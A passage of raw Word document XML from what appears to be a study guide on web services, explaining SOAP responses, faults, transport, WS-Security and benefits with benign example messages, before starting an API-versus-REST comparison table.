    <w:p w14:paraId="38EA2C88" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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When the server receives a SOAP request, it processes the request, performs the necessary operations (such as accessing a database or invoking a service), and generates a SOAP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB3021" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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The response is also in the form of a SOAP message, following the same structure as the request message. It will contain the result of the operation, such as the data requested or any errors that occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3229D8" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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SOAP Response</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A SOAP response message might look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017C24BB" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1299C492" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3016D614" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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xmlns:web="http://example.com/webservice"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771F95B7" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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soapenv:Header/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BF8AE0" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F7921" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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web:getBookDetailsResponse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A16EB50" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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web:bookTitle&gt;Introduction to SOAP&lt;/web:bookTitle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4E2D82" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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web:author&gt;John Doe&lt;/web:author&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E34BF12" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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lastRenderedPageBreak/>
        <w:t xml:space="preserve">         &lt;web:price&gt;29.99&lt;/web:price&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7893167D" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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web:getBookDetailsResponse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD2AA7A" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E2E7E8" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="72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lt;/soapenv:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE78419" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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The &lt;soapenv:Envelope&gt; wraps the response message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3A499" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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The &lt;soapenv:Body&gt; contains the actual response data (in this case, the book details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648E629D" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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SOAP Faults</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456A037E" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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If there is an error during the processing of the SOAP request, the server may return a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP fault</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. A SOAP fault is an error message structured within the &lt;soapenv:Fault&gt; element, which provides details on the error type and description.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F14C62D" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:firstLine="72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Example of a SOAP Fault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B03782D" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26294B" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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xmlns:web="http://example.com/webservice"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360AFF02" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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soapenv:Header/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE5C49E" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB4D9E2" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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soapenv:Fault&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48178FF0" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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faultcode&gt;soapenv:Client&lt;/faultcode&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF9C60D" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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faultstring&gt;Invalid bookId provided&lt;/faultstring&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FAEB8" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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detail&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4ECC6C" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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errorCode&gt;400&lt;/errorCode&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D04FD37" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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message&gt;Book ID does not exist in the system&lt;/message&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3372E060" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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detail&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916A1F5" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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soapenv:Fault&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54502119" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="144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   &lt;/soapenv:Body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2112A7E8" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:ind w:left="1440"/>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lt;/soapenv:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C0315E" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32C4EE" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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The communication typically happens over HTTP or HTTPS, but SOAP can work over other transport protocols such as SMTP, FTP, or JMS. HTTP is the most commonly used protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B9B9E0" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="179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The client sends the SOAP message to the server using the POST method, and the server returns a response to the client with the required information or a fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251C90EE" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179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Security</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F0CA09" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1799"/>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 xml:space="preserve">SOAP can be used with various security protocols such as </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WS-Security</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for handling encryption, authentication, and authorization, which ensures that sensitive data can be securely transmitted over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783915C" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="00000000" w:rsidP="001B573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5D0D8C5">
          <v:rect id="_x0000_i1957" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C6B4F" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary of the SOAP Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735D9D52" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180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Client</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends a SOAP request (an XML message) to the server, which includes the operation to be invoked and any necessary parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69695B15" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180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Server</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes the request and executes the specified operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D81E0F" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180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Server</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> generates a SOAP response, which contains the result of the operation or an error message (SOAP fault).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4305C85E" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1800"/>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Client</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> receives the SOAP response and processes the result or handles any errors returned in the SOAP fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE48A5A" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Benefits of SOAP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C6E1F" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1801"/>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Platform and Language Independence</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: SOAP can work across different platforms and programming languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4539636B" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1801"/>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Security</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It supports WS-Security, ensuring secure communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7D6A3" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1801"/>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Standardized</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: SOAP is a widely accepted standard for web services, especially in enterprise environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E21217" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1801"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It supports message reliability through the WS-ReliableMessaging specification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DCE541" w14:textId="77777777" w:rsidR="000B328B" w:rsidRPr="001B573F" w:rsidRDefault="000B328B" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In essence, SOAP is a protocol for exchanging structured information in a standardized way using XML messages over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F02CD" w14:textId="2397C17A" w:rsidR="000B328B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0003014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687D234">
          <v:rect id="_x0000_i1958" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E66FD7E" w14:textId="24700B5B" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="006C2A4C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="397" w:name="_Toc196307877"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between API and REST</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="397"/>
    </w:p>
    <w:p w14:paraId="10DFA92C" w14:textId="202C4037" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00761CDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz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6"/>
        <w:gridCol w:w="4078"/>
        <w:gridCol w:w="4600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00231500" w:rsidRPr="00CE4B95" w14:paraId="41D78C64" w14:textId="77777777" w:rsidTr="00231500">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F69C25E" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47527D22" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>API (Application Programming Interface)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42974FA7" w14:textId="77777777" w:rsidR="00231500" w:rsidRPr="00CE4B95" w:rsidRDefault="00231500" w:rsidP="00EA09A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
